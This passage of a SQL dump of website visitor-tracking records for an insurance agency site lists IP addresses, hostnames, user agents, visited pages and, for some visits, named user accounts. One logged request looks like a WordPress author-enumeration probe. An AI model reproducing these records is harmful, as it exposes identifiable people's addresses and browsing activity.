49','us','','','','','ykaufman','','0','0',0),(14655,'0b_7a4d6dccd061c8fab06f971267d92343','1460066042','100.43.90.9','spider-100-43-90-9.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(14658,'0b_806b34b4366f846d2fdd5024cdf0f3fd','1460066222','69.114.209.224','ool-4572d1e0.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(14660,'0b_806b34b4366f846d2fdd5024cdf0f3fd','1460066224','69.114.209.224','ool-4572d1e0.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(14663,'0b_806b34b4366f846d2fdd5024cdf0f3fd','1460066233','69.114.209.224','ool-4572d1e0.dyn.optonline.net','/igo/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(14664,'0b_806b34b4366f846d2fdd5024cdf0f3fd','1460066249','69.114.209.224','ool-4572d1e0.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/igo/','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(14667,'0b_806b34b4366f846d2fdd5024cdf0f3fd','1460066269','69.114.209.224','ool-4572d1e0.dyn.optonline.net','/igo/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win10','Chrome 49','us','1920 x 1080','','','','Nkadin','','0','51',0),(14669,'0b_8434251188dfacdb919100274244db95','1460067427','207.46.13.19','msnbot-207-46-13-19.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(14672,'0b_b59cd7cb40565f66c006c32bd86c4ac6','1460067741','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','ykaufman','','0','0',0),(14675,'0b_b59cd7cb40565f66c006c32bd86c4ac6','1460067752','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','ykaufman','','0','0',0),(14678,'0b_a21e26640936756d12035d90f3683b63','1460068121','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(14679,'0b_a21e26640936756d12035d90f3683b63','1460068124','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(14682,'0b_a21e26640936756d12035d90f3683b63','1460068127','69.164.140.246','69.164.140.246.xchangetele.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(14685,'0b_b59cd7cb40565f66c006c32bd86c4ac6','1460068179','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(14688,'0b_b59cd7cb40565f66c006c32bd86c4ac6','1460068189','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(14690,'0b_a21e26640936756d12035d90f3683b63','1460068291','69.164.140.246','69.164.140.246.xchangetele.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','51',0),(14691,'0b_a21e26640936756d12035d90f3683b63','1460068293','69.164.140.246','69.164.140.246.xchangetele.com','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','51',0),(14694,'0b_a21e26640936756d12035d90f3683b63','1460068329','69.164.140.246','69.164.140.246.xchangetele.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','51',0),(14697,'0b_e1a02808722e41b57c0c431375896a5c','1460068483','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(14699,'0b_b59cd7cb40565f66c006c32bd86c4ac6','1460068781','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','ykaufman','','0','0',0),(14702,'0b_b59cd7cb40565f66c006c32bd86c4ac6','1460068792','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','ykaufman','','0','0',0),(14705,'0b_b59cd7cb40565f66c006c32bd86c4ac6','1460069320','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(14708,'0b_b59cd7cb40565f66c006c32bd86c4ac6','1460069332','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(14711,'0b_b59cd7cb40565f66c006c32bd86c4ac6','1460069373','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(14712,'0b_b59cd7cb40565f66c006c32bd86c4ac6','1460069379','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(14714,'0b_8fdc4dced2245fa7d685ea8f92602bd6','1460069435','24.213.165.154','rrcs-24-213-165-154.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(14717,'0b_8fdc4dced2245fa7d685ea8f92602bd6','1460069437','24.213.165.154','rrcs-24-213-165-154.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(14718,'0b_8fdc4dced2245fa7d685ea8f92602bd6','1460069441','24.213.165.154','rrcs-24-213-165-154.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(14721,'0b_8fdc4dced2245fa7d685ea8f92602bd6','1460069452','24.213.165.154','rrcs-24-213-165-154.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(14724,'0b_8fdc4dced2245fa7d685ea8f92602bd6','1460069501','24.213.165.154','rrcs-24-213-165-154.nyc.biz.rr.com','/insentives/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(14727,'0b_8fdc4dced2245fa7d685ea8f92602bd6','1460069505','24.213.165.154','rrcs-24-213-165-154.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(14729,'0b_8fdc4dced2245fa7d685ea8f92602bd6','1460069508','24.213.165.154','rrcs-24-213-165-154.nyc.biz.rr.com','/insentives/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(14730,'0b_8fdc4dced2245fa7d685ea8f92602bd6','1460069510','24.213.165.154','rrcs-24-213-165-154.nyc.biz.rr.com','/about-us/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(14733,'0b_8fdc4dced2245fa7d685ea8f92602bd6','1460069515','24.213.165.154','rrcs-24-213-165-154.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win10','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(14736,'0b_60247a9d6bf401493190e887735e0c89','1460070841','66.102.6.177,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36','http://www.google.com/search','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(14738,'0b_6be6ecf5b13c16d24692ed294d0615d6','1460071727','157.55.39.203','msnbot-157-55-39-203.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(14741,'0b_0f984b6091c681d287e73077a7e12e19','1460072091','54.188.3.212','ec2-54-188-3-212.us-west-2.compute.amazonaws.com','/','python-requests/2.9.1','','',0,'','','','','','python','','','','0','0',0),(14744,'0b_eef1fc1855b49ee93f00bac4a7d60b3b','1460075720','180.76.15.31','baiduspider-180-76-15-31.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(14745,'0b_781c25bd64ce3c56b677bb5abeaccea0','1460075731','180.76.15.13','baiduspider-180-76-15-13.crawl.baidu.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(14748,'0b_680f6782ea9dd038e153793e55f8080b','1460077741','180.76.15.16','baiduspider-180-76-15-16.crawl.baidu.com','/?p=283','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(14750,'0b_680f6782ea9dd038e153793e55f8080b','1460077742','180.76.15.33','baiduspider-180-76-15-33.crawl.baidu.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(14753,'0b_0d627cc258003ef47578e07d955ff10c','1460077781','40.77.167.98','msnbot-40-77-167-98.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(14756,'0b_5a4de5405ae1c0dac752a99d96b285af','1460078505','183.63.239.250,46.161.9.19','46.161.9.19','/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60','http://www.empireins.com/','',0,'WinXP','Google Chrome','us','','','','','','','0','0',0),(14759,'0b_9f79a541ce23ef8d44f959f7208331d6','1460079445','157.55.39.203','msnbot-157-55-39-203.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(14760,'0b_9f79a541ce23ef8d44f959f7208331d6','1460079451','157.55.39.203','msnbot-157-55-39-203.search.msn.com','/about-us','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(14762,'0b_9f79a541ce23ef8d44f959f7208331d6','1460079461','157.55.39.203','msnbot-157-55-39-203.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(14763,'0b_2870a1a2ae69fba3f05845ed22f5dcfb','1460080125','54.188.3.212','ec2-54-188-3-212.us-west-2.compute.amazonaws.com','/','python-requests/2.9.1','','',0,'','','','','','python','','','','0','0',0),(14765,'0b_4b90efebd65634ca91092909f3d75bb9','1460080196','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(14768,'0b_4b90efebd65634ca91092909f3d75bb9','1460080210','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(14771,'0b_4b90efebd65634ca91092909f3d75bb9','1460080227','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(14774,'0b_4b90efebd65634ca91092909f3d75bb9','1460080420','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(14775,'0b_83b629480c80458b962633111f89ab06','1460084747','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(14778,'0b_a683f53c3902f9a2ea565fb0ff6017a7','1460085558','40.77.167.38','msnbot-40-77-167-38.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(14781,'0b_629aba4655a0f459b66350e40054ba57','1460085599','157.55.12.92','msnbot-157-55-12-92.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b','http://www.empireins.com/','',0,'MacOSX','Safari 9537','','','','BingBot','','','','0','0',0),(14784,'0b_ac41fc72ed84a4db5962641b8d5d93b3','1460085988','66.249.64.166','crawl-66-249-64-166.googlebot.com','/insentives/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(14787,'0b_32642544742efb2f290a2071c009cf03','1460087228','40.77.167.98','msnbot-40-77-167-98.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(14790,'0b_2061085df768130657210c486fb92961','1460087564','54.188.3.212','ec2-54-188-3-212.us-west-2.compute.amazonaws.com','/','python-requests/2.9.1','','',0,'','','','','','python','','','','0','0',0),(14792,'0b_eba434c4f3fbb732e0f3938a8edbcd04','1460087929','54.158.128.73','ec2-54-158-128-73.compute-1.amazonaws.com','/feed/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36','','',0,'Win8','Chrome 34','','','','','','','','0','0',0),(14795,'0b_880ee59829017a4e938a6ada44aa7343','1460087929','54.158.128.73','ec2-54-158-128-73.compute-1.amazonaws.com','/feed/','Go 1.1 package http','http://empireins.com/feed/','',0,'','','','','','Go','','','','0','0',0),(14796,'0b_94edb22608bf8240f4f7b3acd8afd128','1460088122','40.77.167.38','msnbot-40-77-167-38.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(14798,'0b_8db83fabae3fa31758824b7a094d633d','1460088266','213.239.205.118','static.213-239-205-118.clients.your-server.de','/feed/','Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0','','',0,'WinXP','Firefox 28','de','','','','','','','0','0',0),(14799,'0b_8db83fabae3fa31758824b7a094d633d','1460088267','213.239.205.118','static.213-239-205-118.clients.your-server.de','/comments/feed/','Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0','','',0,'WinXP','Firefox 28','de','','','','','','','0','0',0),(14801,'0b_8db83fabae3fa31758824b7a094d633d','1460088268','213.239.205.118','static.213-239-205-118.clients.your-server.de','/home/feed/','Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0','','',0,'WinXP','Firefox 28','de','','','','','','','0','0',0),(14804,'0b_8db83fabae3fa31758824b7a094d633d','1460088275','213.239.205.118','static.213-239-205-118.clients.your-server.de','/case-status','Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0','','',0,'WinXP','Firefox 28','de','','','','','','','0','0',0),(14805,'0b_8db83fabae3fa31758824b7a094d633d','1460088275','213.239.205.118','static.213-239-205-118.clients.your-server.de','/case-status/','Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0','','',0,'WinXP','Firefox 28','de','','','','','','','0','0',0),(14807,'0b_8db83fabae3fa31758824b7a094d633d','1460088277','213.239.205.118','static.213-239-205-118.clients.your-server.de','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0','','',0,'WinXP','Firefox 28','de','','','','','','','0','0',0),(14810,'0b_da5b8d7215fcb38a7dc1c62d5549d0ac','1460089460','173.255.243.26','li253-26.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(14811,'0b_34a688a445c34e0e46a012f57781cd21','1460091298','207.46.13.64','msnbot-207-46-13-64.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(14814,'0b_a6a9936f6abfd34674ef072ecbd48585','1460091963','40.77.167.38','msnbot-40-77-167-38.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(14816,'0b_a6919742e6c767bc9f045d9af390141e','1460091979','207.46.13.64','msnbot-207-46-13-64.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(14819,'0b_deef18505fe4f663848cef2563e664a8','1460093454','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(14822,'0b_4126ba36fc3342c9e6789f728955c4e6','1460094123','178.137.86.10','178-137-86-10-lvv.broadband.kyivstar.net','/?author=1','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36','','',0,'WinXP','Chrome 34','','','','','','','','0','0',0),(14825,'0b_501729ecbe494623ca03143382ace957','1460094944','104.131.186.156','104.131.186.156','/','Digincore crawler bot. See https://www.digincore.com/crawler.html for rules and instructions.','','',0,'','','','','','crawler bot','','','','0','0',0),(14826,'0b_0db3fb7dc1242f5addb9490ce12c4b39','1460095781','40.77.167.98','msnbot-40-77-167-98.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(14828,'0b_5fa4b24c31d483144c04c42061c880a9','1460096546','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(14829,'0b_249b06a66f8fb30dcef91ff93df78293','1460099480','81.225.39.30','81-225-39-30-no155.bredband.skanova.com','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)','','',0,'WinXP','IE 6','','','','','','','','0','0',0),(14832,'0b_f663006246baa4a62a703a29cde4e475','1460100434','176.31.39.23','176.31.39.23','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(14835,'0b_80480b101f008983d7cde93b4c86d4d6','1460103636','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(14838,'0b_8a4e985b346823baa393846d70bb0b16','1460103672','192.240.106.138','WIN-QRIEB13SG5H','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0','','',0,'Win7 x64','Firefox 37','','','','','','','','0','0',0),(14841,'0b_e54554e2db0341b17845d48fef8d666f','1460104362','66.249.64.34','crawl-66-249-64-34.googlebot.com','/case-status/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(14846,'0b_9de986e3697fe79a038c25d63cb301ad','1460107445','66.249.64.89','crawl-66-249-64-89.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(14847,'0b_9de986e3697fe79a038c25d63cb301ad','1460107448','66.249.64.89','crawl-66-249-64-89.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(14850,'0b_d9c50478f19be50496497daaed88f178','1460108902','40.77.167.38','msnbot-40-77-167-38.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(14853,'0b_d9c50478f19be50496497daaed88f178','1460109032','40.77.167.38','msnbot-40-77-167-38.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(14855,'0b_30556565b78594304185cbcd3b854a1f','1460110624','180.76.15.23','baiduspider-180-76-15-23.crawl.baidu.com','/carriers/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(14858,'0b_726dcc4c41dd6b2553240fe96cbf3b8d','1460111593','40.77.167.98','msnbot-40-77-167-98.search.msn.com','[404] /pdf/avoid_1099.pdf','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(14859,'0b_1a8b44205057b6f960b58f1de880ebb9','1460115633','66.249.64.29','crawl-66-249-64-29.googlebot.com','/insentives/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(14862,'0b_aa550d023dd6db0083db9290f945dbcb','1460115740','37.59.55.128','crawl06.lp.007ac9.net','/robots.txt','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(14864,'0b_be1d61e55afe8c06d1f98e301e75c01a','1460115741','37.59.55.128','crawl06.lp.007ac9.net','/','Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/10.0.649.0 Safari/534.17','','',0,'Win7','Chrome 10','us','','','Unknown Spider','','','','0','0',0),(14865,'0b_02b64a3b55d2308f2822f7e4a7f9aa90','1460118610','188.166.40.71','188.166.40.71','/robots.txt','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(14867,'0b_02b64a3b55d2308f2822f7e4a7f9aa90','1460118620','188.166.40.71','188.166.40.71','/term-quotes/','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(14868,'0b_02b64a3b55d2308f2822f7e4a7f9aa90','1460118635','188.166.40.71','188.166.40.71','/robots.txt','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(14870,'0b_02b64a3b55d2308f2822f7e4a7f9aa90','1460118655','188.166.40.71','188.166.40.71','/case-status/','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(14871,'0b_02b64a3b55d2308f2822f7e4a7f9aa90','1460119223','188.166.40.71','188.166.40.71','/forms/','SafeDNSBot 